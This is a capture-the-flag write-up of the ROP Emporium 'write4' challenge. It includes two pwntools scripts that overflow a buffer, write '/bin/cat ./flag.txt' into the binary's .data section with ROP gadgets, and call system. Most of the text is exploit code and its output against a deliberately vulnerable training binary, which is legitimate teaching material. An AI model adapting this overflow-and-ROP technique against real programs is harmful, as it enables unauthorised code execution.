We have the same situation as we had in the split challenge, however in this case we do not have the string /bin/cat flag.txt lying around in the binary. We'll have to construct this string in the memory and then ask the system function to execute this.
So we'll just get right into it and try to build the write primitive that will get us the writing capabilities and the we'll construct the complete ROP chain to execution.
First we'll have to find a write able section of the binary that we'll write the data to.
$ readelf -S ./write432 | grep W
[19] .init_array INIT_ARRAY 08049f08 000f08 000004 00 WA 0 0 4
[20] .fini_array FINI_ARRAY 08049f0c 000f0c 000004 00 WA 0 0 4
[21] .jcr PROGBITS 08049f10 000f10 000004 00 WA 0 0 4
[22] .dynamic DYNAMIC 08049f14 000f14 0000e8 08 WA 6 0 4
[23] .got PROGBITS 08049ffc 000ffc 000004 04 WA 0 0 4
[24] .got.plt PROGBITS 0804a000 001000 000028 04 WA 0 0 4
[25] .data PROGBITS 0804a028 001028 000008 00 WA 0 0 4
[26] .bss NOBITS 0804a040 001030 00002c 00 WA 0 0 32
W (write), A (alloc), X (execute), M (merge), S (strings), I (info),
Out of all the write able sections, I tried .jcr, .dynamic, but only .data seemed to be working, I am yet to figure out the reason for this. However, we'll use .data section to write the data.
32 bit
We have to find rop gadget that will let us write to a memory location, something like the following.
mov dword ptr [REG1], REG2
# This will write the data from REG2 to the memory
# location of REG1
This is essentially what we are looking for. Another gadget that we'll need is the one that will help us load the appropriate data to the registers.
So the gadgets that I found were the following:
# Write to memory location
0x08048670 : mov dword ptr [edi], ebp ; ret
# Load the registers with data
0x080486da : pop edi ; pop ebp ; ret
So now all we had to do was make the ROP that will write the string chunks of 4 bytes to the appropriate location, for which I wrote the python script to automate the process.
from pwn import *
import re
final_rop = []
store_vals = 0x080486da
write_str = 0x08048670
system = 0x08048430
data = 0x0804a028
def get_hex_arr():
param = "/bin/cat ./flag.txt;"
# This splits string to pieces of 4
arr = re.findall('.{4}', param)
return [e[::-1].encode("hex") for e in arr]
i = 0
for chunk in get_hex_arr():
final_rop.append(p32(store_vals))
# This is to move the memory location by 4
# every time we write a chunk of string
final_rop.append(p32(data + i))
final_rop.append(p32(int(chunk, 16)))
final_rop.append(p32(write_str))
i += 4
print "A"*44 + ''.join(final_rop) + p32(system) + "JUNK" + p32(data)
And using this exploit script, we have our flag.
$ python exploit.py > final.payload; cat final.payload | ./write432
write4 by ROP Emporium
32bits
Go ahead and give me the string already!
> ROPE{a_placeholder_32byte_flag!}
Segmentation fault
64 bit
We'll follow the same process as done in 32 bit architecture binary, the only difference will come while loading the parameters for the system function, due to difference in way the x64 load parameters.
# Write to the memory location
0x0000000000400820 : mov qword ptr [r14], r15 ; ret
# Load the registers with value
0x0000000000400890 : pop r14 ; pop r15 ; ret
Python script that will generate the complete exploit
from pwn import *
import re
final_rop = []
store_vals = 0x0000000000400890
write_str = 0x0000000000400820
system = 0x4005e0
data = 0x0000000000601050
write_rdi = 0x0000000000400893
ret = 0x00000000004005b9
def get_hex_arr():
# The string has been made of length divisible by 8
# to fix string padding issues
param = "/bin/cat ./flag.txt;echo"
arr = re.findall('.{8}', param)
return [e[::-1].encode("hex") for e in arr]
i = 0
for chunk in get_hex_arr():
final_rop.append(p64(store_vals))
final_rop.append(p64(data + i))
final_rop.append(p64(int(chunk, 16)))
final_rop.append(p64(write_str))
i += 8
# Loading the parameter for system function
final_rop.append(p64(write_rdi))
final_rop.append(p64(data))
final_rop.append(p64(system))
print "A"*40 + ''.join(final_rop)
$ python exploit.py > final.payload ; cat final.payload | ./write4
write4 by ROP Emporium
64bits
Go ahead and give me the string already!
> ROPE{a_placeholder_32byte_flag!}
Segmentation fault